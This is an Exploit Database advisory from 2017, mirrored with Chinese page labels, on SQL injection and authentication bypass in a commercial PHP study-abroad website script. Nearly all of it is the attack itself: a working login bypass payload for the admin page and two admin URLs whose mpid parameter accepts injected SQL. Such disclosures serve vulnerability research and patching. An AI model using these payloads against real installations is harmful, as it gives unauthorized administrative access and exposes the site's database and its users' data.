Study Abroad Educational Website Script – SQL Injection

• Exploit Database
• 9 阅读

• 作者： Ihsan Sencan
  日期： 2017-01-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41112/

• # # # # # 
  # Vulnerability: SQL Injection + Authentication Bypass
  # Date: 18.01.2017
  # Vendor Homepage: http://www.scriptgiant.com/
  # Script Name: Study Abroad Educational Website Script
  # Script Buy Now: http://www.popularclones.com/products/Study-Abroad-Educational-Website
  # Author: Ihsan Sencan
  # Author Web: http://ihsan.net
  # Mail : ihsan[beygir]ihsan[nokta]net
  # # # # #
  # Authentication Bypass :
  # http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
  # SQL Injection/Exploit :
  # http://localhost/[PATH]/admin/list_blogs.php?mpid=[SQL]
  # http://localhost/[PATH]/admin/list_listing.php?mpid=[SQL]
  # E.t.c.... Other files, too. SQL There are security vulnerabilities.
  # # # # #